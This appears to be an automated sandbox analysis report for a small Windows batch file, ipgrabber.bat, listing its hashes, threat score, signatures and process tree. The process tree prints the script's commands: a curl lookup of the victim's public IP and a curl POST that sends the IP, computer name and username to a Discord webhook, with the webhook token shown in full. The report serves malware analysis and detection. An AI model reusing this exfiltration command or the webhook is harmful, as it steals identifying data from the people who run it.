Analysis
-
max time kernel
5s -
max time network
11s -
platform
windows11-21h2_x64 -
resource
win11-20240319-en -
resource tags
-
submitted
28/03/2024, 02:40
General
-
Target
ipgrabber.bat
-
Size
885B
-
MD5
8c630009499ad1e18b95bf686d5a9bc7
-
SHA1
6585a43e58c82be8cc79c94e4b586cac04db2c48
-
SHA256
d8f75de332fd214e5663fc5a8d756e1bc51263f32789057eb52b46574cebe883
-
SHA512
3f8fc53f66d10914c47f447fce5a14e0e06f2cd981746537dc2bcc48ba2d7b9d77d849734a4fe7fedb5ee17cabb9d36ce2dafa53779e6c49eec57981c039de4f
Score
6/10
Malware Config
Signatures
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ipgrabber.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s "https://api64.ipify.org?format=json" | findstr /r /c:"\"ip\":"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -s "https://api64.ipify.org?format=json"3⤵
-
-
C:\Windows\system32\findstr.exefindstr /r /c:"\"ip\":"3⤵
-
-
-
C:\Windows\system32\curl.execurl -X POST -H "Content-Type: application/json" -d "{ \"content\": \"Location: OMGISSQW\"ip: {"ip":"89.149.23.59"}"\"PCNAME: OMGISSQW"\"User: Admin"}" https://discord.com/api/webhooks/1222730303299129455/C-jlNtX8rSs6pyYUKNodg2N2Jhdmf4Yw1PhKn4b6292btwdZrdU8l6wWN1dbklKjw-072⤵
-